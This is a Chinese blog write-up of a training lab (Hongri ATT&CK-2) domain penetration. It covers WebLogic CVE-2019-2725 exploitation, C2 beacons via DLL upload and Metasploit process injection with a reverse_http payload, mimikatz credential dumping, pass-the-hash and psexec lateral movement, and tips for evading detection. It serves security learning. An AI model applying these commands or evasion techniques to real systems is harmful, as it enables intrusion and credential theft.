1154 字
6 分钟
红日安全靶场-ATT&CK-2(weblogic利用+msf、C2联合域渗透)
红日安全靶场-ATT&CK-2(weblogic利用+msf、C2联合域渗透)
声明
- 本文为个人红日安全靶场-ATT&CK-2的复现通关记录,旨在分享靶机和记录学习心得体会,由于本人域知识较为薄弱,讲解若有谬误之处欢迎指正。
- 该靶机下载地址为’http://vulnstack.qiyuanxuetang.net/vuln/detail/3/’
环境搭建
- 环境搭建可参考官方介绍(如下图),实际在VMWare中可以通过设置PC、WEB为NAT(192.168.111.0/24)+仅主机模式(10.10.10.0/24)段,以及DC的仅主机模式进行搭建。(详细搭建中很多细节可参考视频https://www.bilibili.com/video/BV1De4y1a7Ps/?spm_id_from=333.1007.top_right_bar_window_history.content.click&vd_source=bf6e70c9a35cc4e89aa6a48a72b2aa98,比如开启web服务等细节就不多介绍了)
- 官方拓扑图可参考下图。
初步渗透
- 扫描一下,看到暴露的两个IP分别是WEB和PC(DC处于内网环境无法接触外网)。
- 对发现主机进行端口扫描,发现192.168.111.80是个WEB服务器,7001端口是weblogic服务器默认端口,尝试访问。
- 访问7001端口,网页没什么内容。
- 通过访问/console找到后台,尝试默认密码和弱密码登录无效。
- 通过github下载此工具,可以用于weblogic历史漏洞的探测和验证,发现了很多验证存在的漏洞。
- 以CVE-2019-2725为例,通过searchsploit搜索利用脚本,将其下载手动验证。
- 阅读脚本用法,需要我们通过msf框架生成payload,并且替换掉脚本payload字段内容,再通过python2执行。
- msf框架生成后复制payload,并替换python脚本指定内容。
- 按照如下操作打开msf的监听模块,并随后执行python脚本,拿到了与WEB主机的初始会话。
- 经过验证是该主机与攻击主机连接。
WEB主机C2上线-方法一
- 由于个人习惯用C2进行域内操作,这里打算将WEB主机上线到C2,这里采用上传dll文件的方式获取控制。
- 将生成的dll文件上传到可操作目录下。
- 查看目录确定上传成功。
- 通过以下方式,加载dll文件。
- 在C2客户端,WEB服务器已经上线。
WEB主机C2上线-方法二
- 在文章’https://blog.csdn.net/weixin_54977781/article/details/131178720’中,给出了msf和C2会话相互转移的方式,参照以上,先在C2客户端建立一个新的监听器。
- 在msf会话执行ps查看进程,由于目标机器为32位系统,需要找到图中为x86的进程,记下pid号,优先选择高权限的进程。
- 按照顺序在msf中输入:
use exploit/windows/local/payload_injectset payload windows/meterpreter/reverse_httpset LHOST 192.168.111.131set LPORT 82 //ip和端口根据自己设置监听器修改set DisablePayloadHandler trueset PrependMigrate falseset PID 注入进程号set SESSION 1 //注意换成实际会话号,使用sessions -l查看exploit
4. 这次成功以进程注入方式上线C2。
内网渗透与横向移动
- 在beacon中收集域内信息。
- 执行中发现无法查看域名,意识到本机的SYSTEM并非域内账户。
- 先通过插件中的mimikatz获取域内密码。
- 使用C2官方功能,选中以域内mssql用户上线,这里用的新指定的一个监听器。
- 执行后mssql如愿上线C2。
- 继续收集域内信息,确认了域名和域控主机地址。
- 使用mimikatz进行PTH横向,此时拥有了域内administator的登录凭证。
- 使用
jump psexec 主机名 监听器的方式进行横向移动,成功获取域控和PC的控制权。
其它补充与收获总结
- 对于上线C2主机的两个方法,个人认为第二个比第一个要适当隐蔽些,做到无文件落地,通过将恶意代码注入指定进程相对而言更隐蔽,但仍然有内存特征等,容易被发现,推荐对shellcode进行加密混淆或者在内存中动态解密,由于掌握不深,本篇很多方式都是仅考虑打靶完成度来进行的,而没有很注意隐蔽,包括后面的mimikatz存在明显特征容易被拦截和psexec会产生大量安全日志,在实战中则推荐使用其它途径寻找凭证,以及其它横向技术如WMI、DCOM、计划任务等。
set PrependMigrate falseset PID 注入进程号,在这里由于操作问题我手动指定的进程注入,实际可以优先通过设置set PrependMigrate true注入后自动寻找并迁移到另一个稳定的系统进程(如 explorer.exe、svchost.exe),通常有更高的稳定性。
红日安全靶场-ATT&CK-2(weblogic利用+msf、C2联合域渗透)
https://www.dxowo8.top/posts/post-28/28/ 部分信息可能已经过时